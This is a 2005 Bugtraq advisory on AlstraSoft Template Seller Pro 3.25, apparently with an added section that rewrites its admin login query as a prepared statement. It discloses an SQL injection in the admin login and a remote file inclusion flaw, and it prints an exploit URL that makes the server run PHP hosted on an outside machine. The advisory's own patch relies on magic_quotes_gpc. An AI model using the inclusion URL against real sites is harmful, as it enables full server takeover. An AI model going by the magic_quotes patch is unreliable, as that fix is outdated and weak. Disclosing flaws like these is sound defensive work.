
List:       bugtraq
Subject:    Template Seller Pro 3.25
From:       r.verton () gmail ! com
Date:       2005-11-15 19:39:01
Message-ID: 20051115193901.15910.qmail () securityfocus ! com

AlstraSoft Template Seller Pro 3.25 
===================================

   Software: AlstraSoft Template Seller Pro 3.25
   Severity: Arbitrary code execution, SQL Injection(s)
   Risk: High
   Author: Robin Verton <r.verton@gmail.com>
   Date: Nov. 15 2005
   Vendor: www.alstrasoft.com


   Description:

	Ever thought of starting your very own profitable shopping cart business just like TemplateMonster.com? With AlstraSoft Template Seller Pro software, you can run your own templates store selling templates such as website templates, logo templates, flash intro templates, frontpage templates and many more! The flexibility of Template Seller Pro software also allows you to run a membership based templates business just like BoxedArt.com by offering paid members multiple templates download instantly. [http://www.alstrasoft.com/]


   Details:

	1) /include/paymentplugins/payment_paypal.php

	   /**
	   Paypal payment plugin
	   */
	  global $config,$conn;
	  include("$config[basepath]/include/payment/class.paypal_ipn.php");
	  include("$config[basepath]/include/paymentplugins/paymentplugin.php");

	   
	  If register_globals is on, the request can set $config[basepath], so we can include and execute any PHP code of our choice. This is very dangerous because, if safe_mode is off and there is no restriction on executing commands, an attacker can get access to every file on the server.

	  http://www.example.com/include/paymentplugins/payment_paypal.php?config[basepath]=http://youhost.com/our-code.txt?


	  Because of the trailing '?', the '/include/payment/class.paypal_ipn.php' that the include statement appends is passed as a query-string parameter to the our-code.php script, so only the script we set in $config[basepath] is included.

	2) /admin/index.php

	  $sql_user_name = $user_name;
	  $md5_pass = md5($user_pass);

	  $sql = "SELECT * FROM UserDB WHERE user_name='$sql_user_name' and user_password='$md5_pass'";

	  The user-submitted variable for the username is inserted into the query without any validation. Because of this we can inject SQL of our choice into the query sent to the database.

	Nearly no user-submitted variable is validated, so a few more SQL injections are possible.

   Patch:
          Insert constants and use the following code to prevent such attacks

	  if( !defined('IN_SYS') ) {
		die('Hacking Attempt!');
	  }

	  and activate magic_quotes_gpc
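As an added example, neither the vendor's code nor the patch the advisory proposes: the login query from /admin/index.php rewritten with a mysqli prepared statement. Binding the user name and the password hash as parameters keeps them out of the SQL text, so the fix no longer relies on magic_quotes_gpc (which was deprecated in PHP 5.3 and removed in PHP 5.4). The table and column names are those quoted in the advisory; the mysqli connection, the function name admin_login() and the $_POST field names are assumptions, and get_result() requires the mysqlnd driver.

```php
<?php
// Added example, not the vendor's code: the admin login query from
// /admin/index.php rebuilt with a prepared statement. Table and column
// names (UserDB, user_name, user_password) are those quoted in the
// advisory; connection details below are placeholders.

function admin_login(mysqli $conn, string $user_name, string $user_pass): ?array
{
    // The existing schema stores md5(password); kept here so the query
    // matches the table as deployed. password_hash()/password_verify()
    // is the stronger choice once the schema can be migrated.
    $md5_pass = md5($user_pass);

    // Placeholders are bound as data: a user name such as
    // "admin' -- " is compared literally, not parsed as SQL.
    $stmt = $conn->prepare(
        'SELECT * FROM UserDB WHERE user_name = ? AND user_password = ?'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $conn->error);
    }
    $stmt->bind_param('ss', $user_name, $md5_pass);
    $stmt->execute();

    $row = $stmt->get_result()->fetch_assoc();   // needs mysqlnd
    $stmt->close();

    return $row ?: null;   // null when no user/password pair matches
}

// Usage (host, credentials and database name are placeholders):
// $conn  = new mysqli('localhost', 'dbuser', 'dbpass', 'templateseller');
// $admin = admin_login($conn, $_POST['user_name'] ?? '', $_POST['user_pass'] ?? '');
// if ($admin === null) {
//     die('Login failed');
// }
```

The same pattern applies to the other unvalidated variables the advisory mentions: every value that originates from the request goes through bind_param(), and the SQL string itself never contains request data.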
  
   Credits:

	Credit goes to Robin Verton

   References:

	[1] http://www.alstrasoft.com/template.htm
	[2] http://myblog.it-security23.net

